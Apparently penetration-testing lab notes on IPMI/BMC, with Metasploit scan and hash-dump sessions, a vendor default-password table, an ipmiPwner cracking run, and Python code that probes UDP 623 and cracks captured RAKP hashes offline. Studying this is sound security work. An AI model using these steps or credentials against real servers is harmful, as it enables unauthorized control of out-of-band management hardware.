Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based, out-of-band host management and monitoring. It runs on a dedicated controller (the Baseboard Management Controller, BMC) as an autonomous subsystem that works independently of the host's BIOS, CPU, firmware and operating system, and is normally reached over UDP port 623. IPMI gives sysadmins the ability to manage and monitor systems even when they are powered off or unresponsive. That same reachability makes an exposed BMC a high-value target: anyone who can talk to port 623 can query its authentication capabilities without credentials, as the scan below shows.
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
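What the scan above actually does on the wire, as an added example that is not code from this page, from Metasploit or from any BMC vendor: it builds the unauthenticated Get Channel Authentication Capabilities request that ipmi_version sends to UDP/623, decodes a reply according to the bit layout in the IPMI 2.0 specification (Table 22-15), and prints it in the same banner wording as the module so the two can be compared. The reply bytes are constructed here to reproduce the banner shown above (a real BMC would answer from 10.129.42.195:623); the findings() mapping is my own reading of the flags, not part of the tool.

```python
import struct

RMCP_HEADER = bytes([0x06, 0x00, 0xFF, 0x07])   # RMCP v6, reserved, seq 0xFF (no ACK wanted), class 7 = IPMI
BMC_ADDR, CONSOLE_ADDR = 0x20, 0x81
NETFN_APP, CMD_GET_CHANNEL_AUTH_CAPS = 0x06, 0x38


def ipmb_checksum(field: bytes) -> int:
    """IPMI 2's-complement checksum: the byte that makes the covered field sum to zero mod 256."""
    return (-sum(field)) & 0xFF


def wrap_session(ipmb: bytes) -> bytes:
    """IPMI v1.5 session wrapper for a pre-session message: auth type none, sequence 0, session ID 0."""
    return RMCP_HEADER + bytes([0x00]) + struct.pack("<II", 0, 0) + bytes([len(ipmb)]) + ipmb


def frame_ipmb(header: bytes, body: bytes) -> bytes:
    return header + bytes([ipmb_checksum(header)]) + body + bytes([ipmb_checksum(body)])


def build_auth_caps_request(channel: int = 0x0E, privilege: int = 0x04) -> bytes:
    """The probe ipmi_version sends: Get Channel Authentication Capabilities (NetFn App, cmd 0x38) for
    'this channel' (0x0E) with bit 7 set to request IPMI 2.0 extended data, at Administrator (0x04)."""
    header = bytes([BMC_ADDR, NETFN_APP << 2])                       # rsAddr, netFn/rsLUN
    body = bytes([CONSOLE_ADDR, 0x00, CMD_GET_CHANNEL_AUTH_CAPS,      # rqAddr, rqSeq/rqLUN, cmd
                  channel | 0x80, privilege])
    return wrap_session(frame_ipmb(header, body))


def build_auth_caps_response(channel: int, auth_support: int, auth_status: int, ext_caps: int,
                             oem_id: int = 0, completion: int = 0x00) -> bytes:
    """Constructed BMC side of the exchange so the parser can run offline (response NetFn = App | 1)."""
    header = bytes([CONSOLE_ADDR, (NETFN_APP | 1) << 2])
    body = (bytes([BMC_ADDR, 0x00, CMD_GET_CHANNEL_AUTH_CAPS, completion, channel,
                   auth_support, auth_status, ext_caps]) + oem_id.to_bytes(3, "little") + b"\x00")
    return wrap_session(frame_ipmb(header, body))


def parse_auth_caps_response(packet: bytes) -> dict:
    """Decode the reply per IPMI 2.0 Table 22-15; both IPMB checksums must verify before any field is trusted."""
    if len(packet) < 14 or packet[:4] != RMCP_HEADER:
        raise ValueError("not an RMCP/IPMI session packet")
    length = packet[13]
    ipmb = packet[14:14 + length]
    if len(ipmb) != length or length < 16:
        raise ValueError("truncated IPMI message")
    if ipmb_checksum(ipmb[:3]) != 0 or ipmb_checksum(ipmb[3:]) != 0:
        raise ValueError("IPMB checksum mismatch")
    if ipmb[1] >> 2 != (NETFN_APP | 1) or ipmb[5] != CMD_GET_CHANNEL_AUTH_CAPS:
        raise ValueError("not a Get Channel Authentication Capabilities response")
    if ipmb[6] != 0x00:
        return {"completion_code": ipmb[6]}
    auth_support, auth_status, ext_caps = ipmb[8], ipmb[9], ipmb[10]
    return {
        "completion_code": 0x00,
        "channel": ipmb[7],
        "ipmi_version": "2.0" if auth_support & 0x80 else "1.5",
        "auth_types": [name for bit, name in ((5, "oem_auth"), (4, "password"), (2, "md5"), (1, "md2"),
                                              (0, "null")) if auth_support & (1 << bit)],
        "kg_non_default": bool(auth_status & 0x20),
        "per_message_auth": not (auth_status & 0x10),   # bit set = per-message auth DISABLED
        "user_level_auth": not (auth_status & 0x08),    # bit set = user-level auth DISABLED
        "non_null_usernames": bool(auth_status & 0x04),
        "null_usernames": bool(auth_status & 0x02),
        "anonymous_login": bool(auth_status & 0x01),
        "connections": [v for bit, v in ((0, "1.5"), (1, "2.0")) if ext_caps & (1 << bit)],
        "oem_id": int.from_bytes(ipmb[11:14], "little"),
    }


def banner(info: dict) -> str:
    """Same wording as the ipmi_version output above, so a decoded reply can be compared line by line."""
    flags = [("per_message_auth", "auth_msg"), ("user_level_auth", "auth_user"),
             ("non_null_usernames", "non_null_user"), ("null_usernames", "null_user"),
             ("anonymous_login", "anon_user")]
    user = ", ".join(name for key, name in flags if info[key])
    return (f"IPMI-{info['ipmi_version']} UserAuth({user}) "
            f"PassAuth({', '.join(info['auth_types'])}) Level({', '.join(info['connections'])})")


def findings(info: dict) -> list:
    """What a tester does with the flags (my reading of them, not part of the tool)."""
    out = []
    if info["anonymous_login"]:
        out.append("anonymous login enabled")
    if info["null_usernames"]:
        out.append("null usernames enabled")
    if "null" in info["auth_types"]:
        out.append("auth type 'none' advertised: IPMI 1.5 sessions may activate without a password")
    if "2.0" in info["connections"]:
        out.append("IPMI 2.0/RMCP+ offered: RAKP returns a password HMAC to any client that names a user")
    return out


if __name__ == "__main__":
    print("request :", build_auth_caps_request().hex())
    # Constructed reply reproducing the banner in the scan above: 0x97 = 2.0 ext + password/md5/md2/none,
    # 0x04 = per-message and user-level auth on, non-null usernames only, 0x03 = 1.5 and 2.0 connections.
    info = parse_auth_caps_response(build_auth_caps_response(0x01, 0x97, 0x04, 0x03))
    print("response:", banner(info))
    for item in findings(info):
        print(" -", item)
```

The request is 23 bytes and needs no session, which is why the module can sweep a whole range (BATCHSIZE) without credentials. The checksum check matters when you point the parser at live traffic: a BMC that answers from a different channel number or an OEM that pads the message will otherwise be mis-decoded silently.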
Default passwords

Product           Username       Password
Dell iDRAC        root           calvin
HP iLO            Administrator  randomized 8-character string of numbers and uppercase letters (printed on the server's iLO label)
Supermicro IPMI   ADMIN          ADMIN
Metasploit Wordlists
ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt
Getting the password
Metasploit Dumping Hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 10.129.42.195 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 623 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
I don't know why, but hashcat didn't find the password :(
ipmiPwner
[Apr 06, 2024 - 05:26:05 (EDT)] exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash
[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
\_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python
[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #
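What the "hash" in both the Metasploit and the ipmiPwner output really is, as an added example that is not part of this page, of Metasploit or of ipmiPwner: the long hex field is not a password hash but the RAKP Message 2 data (console and BMC session IDs, both 16-byte nonces, the BMC GUID, the requested role and the username), and the short field is the HMAC-SHA1 the BMC computed over it with the user's password as the key. The BMC hands this pair to any client that names a valid user, before any authentication, which is why the dump needs no credentials and why the only fix is a strong password. The code parses Metasploit's user:salt:hmac line and john's/ipmiPwner's $rakp$salt$hmac line (hashcat mode 7300 takes the same salt:hmac pair), decodes the fields, and runs the HMAC-SHA1 guess loop offline. forge_rakp_line() is a constructed BMC side with fixed session IDs and nonces (a real BMC draws them per session) so the round trip can be checked without a target.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Captured lines copied from the two runs on this page (ADMIN from ipmi_dumphashes, admin from ipmiPwner).
METASPLOIT_LINE = ("ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9e"
                   "a123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e")
JOHN_LINE = ("$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9f"
             "a123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a")

PRIVILEGE = {1: "callback", 2: "user", 3: "operator", 4: "administrator", 5: "oem"}


def parse_rakp_line(line: str):
    """Accept Metasploit's 'user:salt:hmac' or john/ipmiPwner's '$rakp$salt$hmac', with or without the
    trailing ':password' a cracked-hash file carries. Returns (salt_bytes, hmac_bytes)."""
    line = line.strip()
    if line.startswith("$rakp$"):
        salt_hex, mac_hex = line[len("$rakp$"):].split("$", 1)
    else:
        _user, salt_hex, mac_hex = line.split(":", 2)
    return bytes.fromhex(salt_hex), bytes.fromhex(mac_hex.split(":", 1)[0])


def decode_rakp_salt(salt: bytes) -> dict:
    """Split the 'salt' into the RAKP Message 2 fields the BMC signs with the user's password:
    SIDc(4) SIDm(4) Rc(16) Rm(16) GUIDm(16) role(1) ulen(1) username(ulen)."""
    if len(salt) < 58:
        raise ValueError("salt shorter than the fixed RAKP2 fields")
    ulen = salt[57]
    if len(salt) != 58 + ulen:
        raise ValueError("username length byte does not match salt length")
    return {
        "console_session_id": salt[0:4].hex(),
        "bmc_session_id": salt[4:8].hex(),
        "console_random": salt[8:24].hex(),
        "bmc_random": salt[24:40].hex(),
        "bmc_guid": salt[40:56].hex(),
        "privilege": PRIVILEGE.get(salt[56] & 0x0F, "reserved"),
        "name_only_lookup": bool(salt[56] & 0x10),      # 0x14 = administrator, looked up by name
        "username": salt[58:].decode("ascii", "replace"),
    }


def rakp2_hmac(password: str, salt: bytes) -> bytes:
    """RAKP-HMAC-SHA1 over the RAKP2 fields. The BMC zero-pads the password to a 20-byte key; HMAC
    zero-pads any key shorter than its block size anyway, so the raw password gives the same digest."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def crack_rakp_line(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess loop: the check ipmi_dumphashes does with CRACK_COMMON and ipmiPwner with -c."""
    salt, mac = parse_rakp_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_hmac(candidate, salt), mac):
            return candidate
    return None


def forge_rakp_line(username: str, password: str, guid_hex: str = "00" * 16) -> str:
    """Constructed BMC side: a Metasploit-style line for a known password, with fixed session IDs and
    nonces (assumption for testing; a real BMC picks them per session)."""
    salt = (bytes.fromhex("01020304") + bytes.fromhex("0a0b0c0d") + bytes(range(16)) + bytes(range(16, 32))
            + bytes.fromhex(guid_hex) + bytes([0x14, len(username)]) + username.encode())
    return f"{username}:{salt.hex()}:{rakp2_hmac(password, salt).hex()}"


if __name__ == "__main__":
    guesses = ["ADMIN", "calvin", "trinity"]          # the defaults above plus the ipmiPwner result
    for line in (METASPLOIT_LINE, JOHN_LINE):
        fields = decode_rakp_salt(parse_rakp_line(line)[0])
        print(f"{fields['username']!r} ({fields['privilege']}) GUID {fields['bmc_guid']}:",
              crack_rakp_line(line, guesses))
```

Two things worth noticing in the decoded fields: both captures carry the same BMC GUID, which identifies the target across sessions, and the role byte 0x14 shows the client asked for Administrator with a name-only lookup, so the BMC answered as long as the username existed, regardless of the privilege that user actually holds.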